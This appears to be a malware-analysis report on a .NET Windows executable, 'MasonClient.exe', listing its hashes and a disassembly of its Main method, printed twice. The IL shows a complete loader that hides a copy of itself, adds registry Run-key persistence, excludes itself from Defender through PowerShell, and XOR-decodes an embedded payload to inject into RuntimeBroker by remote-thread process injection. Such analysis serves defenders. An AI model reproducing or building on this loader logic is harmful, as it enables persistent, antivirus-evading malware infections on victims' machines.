9c1d8a75f3434b323dabf019bd457a54

PE Executable
|
MD5: 9c1d8a75f3434b323dabf019bd457a54
|
Size: 74.75 KB
|
application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	9c1d8a75f3434b323dabf019bd457a54
Sha1	3d62990550c5c50d5be8808b28a2ef143706e4e7
Sha256	7e1c737b0425f74274a9a7b03335c72f8b0e82f7713e1713f98db9a0ad2c34cf
Sha384	5e7a34cdd2e8d5152b7162695b49415b4d0583ecbc0b68b6bfdc786e4cd94eb254931b365c9e5edfd9bc5ad7e4ba3cac
Sha512	f074937a07cd689f3281b2a5505e60e6896cf67477db66c52b8f66a31eba2ac7f881e9c4037f7cf917636f0464926a04e3ab197bdbef5702830040baf14b451b
SSDeep	1536:Q4fNA6Zx2oIxYmmEnM3i+nrs8GRWZwubeXzPCVlKMEMTs98m:Q4fG8xMxtfR+KWOuKDKVMKTs9P
TLSH	8B73E088C6F94141D7C60978BC7056AA53B3A636215C4A8D23FA39CE2E017CB1D172FD

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Module Name	MasonClient.exe
Full Name	MasonClient.exe
EntryPoint	System.Void 锛濅頍哨镑廃掛殒::Main(System.String[])
Scope Name	MasonClient.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	MasonClient
Assembly Version	0.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	9
Main Method	System.Void 锛濅頍哨镑廃掛殒::Main(System.String[])
Main IL Instruction Count	361
Main IL	newobj System.Void 锛濅頍哨镑廃掛殒/<>c__DisplayClass5::.ctor() stloc.s V_18 nop <null> nop <null> call System.String System.IO.Path::GetRandomFileName() call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stloc.0 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() call System.String System.IO.Path::GetExtension(System.String) call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() ldloc.2 <null> ldc.i4.1 <null> call System.Void System.IO.File::Copy(System.String,System.String,System.Boolean) nop <null> ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0078: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0077: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_00AA: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_00A9: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_00B5: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00B5: nop nop <null> nop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_4 ldloc.s V_4 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_4 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_4 ldstr Add-MpPreference -ExclusionPath "{0}" ldloc.2 <null> call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_4 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() nop <null> nop <null> leave.s IL_00FE: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00FE: nop nop <null> nop <null> leave.s IL_0109: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_0109: nop nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0144: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0143: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_014D: nop pop <null> nop <null> nop <null> leave.s IL_014D: nop nop <null> call System.Boolean System.Net.NetworkInformation.NetworkInterface::GetIsNetworkAvailable() stloc.s V_19 ldloc.s V_19 brtrue.s IL_0161: ldc.i4.s 13 ldc.i4.s 99 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4.s 13 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}/__StaticArrayInitTypeSize=13 <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}::$$method0x6000007-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldloc.s V_18 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr MasonClient callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stfld System.Byte[] 锛濅頍哨镑廃掛殒/<>c__DisplayClass5::classNameBytes ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldloc.s V_18 ldftn System.Boolean 锛濅頍哨镑廃掛殒/<>c__DisplayClass5::<Main>b__1(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) call System.Boolean System.Linq.Enumerable::Any<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01BC: ldc.i4 66123 ldc.i4.s 98 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 66123 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}/__StaticArrayInitTypeSize=66123 <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}::$$method0x6000007-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4 181 stloc.s V_8 ldloc.s V_7 ldlen <null> conv.i4 <null> newarr System.Byte stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_01FE: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldloc.s V_7 ldloc.s V_10 ldelem.u1 <null> ldloc.s V_8 xor <null> conv.u1 <null> stelem.i1 <null> ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_7 ldlen <null> conv.i4 <null> clt <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01EA: ldloc.s V_9 ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 brtrue.s IL_0230: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 ldnull <null> ldftn System.Boolean 锛濅頍哨镑廃掛殒::<Main>b__3(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) stsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 br.s IL_0230: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_11 ldloc.s V_11 ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0251: ldc.i4 1082 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 1082 ldc.i4.0 <null> ldloc.s V_11 callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr 锛濅頍哨镑廃掛殒::OpenProcess(System.UInt32,System.Boolean,System.UInt32) stloc.s V_12 ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0281: nop ldc.i4.2 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.4 <null> call System.IntPtr 锛濅頍哨镑廃掛殒::VirtualAllocEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02B6: ldloc.s V_12 ldc.i4.3 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldloc.s V_9 ldlen <null> conv.i4 <null> ldloca.s V_14 call System.Boolean 锛濅頍哨镑廃掛殒::WriteProcessMemory(System.IntPtr,System.IntPtr,System.Byte[],System.UInt32,System.UInt32&) brfalse.s IL_02D5: ldc.i4.0 ldloc.s V_14 conv.u8 <null> ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> ceq <null> br.s IL_02D6: nop ldc.i4.0 <null> nop <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02E4: ldloc.s V_12 ldc.i4.4 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4.s 32 ldloca.s V_15 call System.Boolean 锛濅頍哨镑廃掛殒::VirtualProtectEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32&) stloc.s V_19 ldloc.s V_19 brtrue.s IL_0302: ldloc.s V_12 ldc.i4.5 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_16 call System.IntPtr 锛濅頍哨镑廃掛殒::CreateRemoteThread(System.IntPtr,System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_17 ldloc.s V_17 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0337: ldloc.s V_17 ldc.i4.6 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_17 call System.Boolean 锛濅頍哨镑廃掛殒::CloseHandle(System.IntPtr) pop <null> nop <null> leave.s IL_034D: nop nop <null> ldloc.s V_12 call System.Boolean 锛濅頍哨镑廃掛殒::CloseHandle(System.IntPtr) pop <null> nop <null> endfinally <null> nop <null> nop <null> ret <null>
Module Name	MasonClient.exe
Full Name	MasonClient.exe
EntryPoint	System.Void 锛濅頍哨镑廃掛殒::Main(System.String[])
Scope Name	MasonClient.exe
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	MasonClient
Assembly Version	0.0.0.0
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	<null>
Total Strings	9
Main Method	System.Void 锛濅頍哨镑廃掛殒::Main(System.String[])
Main IL Instruction Count	361
Main IL	newobj System.Void 锛濅頍哨镑廃掛殒/<>c__DisplayClass5::.ctor() stloc.s V_18 nop <null> nop <null> call System.String System.IO.Path::GetRandomFileName() call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stloc.0 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() call System.String System.IO.Path::GetExtension(System.String) call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() ldloc.2 <null> ldc.i4.1 <null> call System.Void System.IO.File::Copy(System.String,System.String,System.Boolean) nop <null> ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0078: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0077: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_00AA: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_00A9: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_00B5: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00B5: nop nop <null> nop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_4 ldloc.s V_4 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_4 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_4 ldstr Add-MpPreference -ExclusionPath "{0}" ldloc.2 <null> call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_4 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() nop <null> nop <null> leave.s IL_00FE: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00FE: nop nop <null> nop <null> leave.s IL_0109: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_0109: nop nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0144: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0143: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_014D: nop pop <null> nop <null> nop <null> leave.s IL_014D: nop nop <null> call System.Boolean System.Net.NetworkInformation.NetworkInterface::GetIsNetworkAvailable() stloc.s V_19 ldloc.s V_19 brtrue.s IL_0161: ldc.i4.s 13 ldc.i4.s 99 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4.s 13 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}/__StaticArrayInitTypeSize=13 <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}::$$method0x6000007-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldloc.s V_18 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr MasonClient callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stfld System.Byte[] 锛濅頍哨镑廃掛殒/<>c__DisplayClass5::classNameBytes ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldloc.s V_18 ldftn System.Boolean 锛濅頍哨镑廃掛殒/<>c__DisplayClass5::<Main>b__1(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) call System.Boolean System.Linq.Enumerable::Any<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01BC: ldc.i4 66123 ldc.i4.s 98 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 66123 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}/__StaticArrayInitTypeSize=66123 <PrivateImplementationDetails>{74A5F5C4-CC56-4D46-B572-4C31E6D0CF2B}::$$method0x6000007-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4 181 stloc.s V_8 ldloc.s V_7 ldlen <null> conv.i4 <null> newarr System.Byte stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_01FE: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldloc.s V_7 ldloc.s V_10 ldelem.u1 <null> ldloc.s V_8 xor <null> conv.u1 <null> stelem.i1 <null> ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_7 ldlen <null> conv.i4 <null> clt <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01EA: ldloc.s V_9 ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 brtrue.s IL_0230: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 ldnull <null> ldftn System.Boolean 锛濅頍哨镑廃掛殒::<Main>b__3(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) stsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 br.s IL_0230: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 锛濅頍哨镑廃掛殒::CS$<>9__CachedAnonymousMethodDelegate4 call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_11 ldloc.s V_11 ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0251: ldc.i4 1082 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 1082 ldc.i4.0 <null> ldloc.s V_11 callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr 锛濅頍哨镑廃掛殒::OpenProcess(System.UInt32,System.Boolean,System.UInt32) stloc.s V_12 ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0281: nop ldc.i4.2 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.4 <null> call System.IntPtr 锛濅頍哨镑廃掛殒::VirtualAllocEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02B6: ldloc.s V_12 ldc.i4.3 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldloc.s V_9 ldlen <null> conv.i4 <null> ldloca.s V_14 call System.Boolean 锛濅頍哨镑廃掛殒::WriteProcessMemory(System.IntPtr,System.IntPtr,System.Byte[],System.UInt32,System.UInt32&) brfalse.s IL_02D5: ldc.i4.0 ldloc.s V_14 conv.u8 <null> ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> ceq <null> br.s IL_02D6: nop ldc.i4.0 <null> nop <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02E4: ldloc.s V_12 ldc.i4.4 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4.s 32 ldloca.s V_15 call System.Boolean 锛濅頍哨镑廃掛殒::VirtualProtectEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32&) stloc.s V_19 ldloc.s V_19 brtrue.s IL_0302: ldloc.s V_12 ldc.i4.5 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_16 call System.IntPtr 锛濅頍哨镑廃掛殒::CreateRemoteThread(System.IntPtr,System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_17 ldloc.s V_17 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0337: ldloc.s V_17 ldc.i4.6 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_17 call System.Boolean 锛濅頍哨镑廃掛殒::CloseHandle(System.IntPtr) pop <null> nop <null> leave.s IL_034D: nop nop <null> ldloc.s V_12 call System.Boolean 锛濅頍哨镑廃掛殒::CloseHandle(System.IntPtr) pop <null> nop <null> endfinally <null> nop <null> nop <null> ret <null>

9c1d8a75f3434b323dabf019bd457a54 (74.75 KB)

9c1d8a75f3434b323dabf019bd457a54

PE Executable | MD5: 9c1d8a75f3434b323dabf019bd457a54 | Size: 74.75 KB | application/x-dosexec

PE Executable
|
MD5: 9c1d8a75f3434b323dabf019bd457a54
|
Size: 74.75 KB
|
application/x-dosexec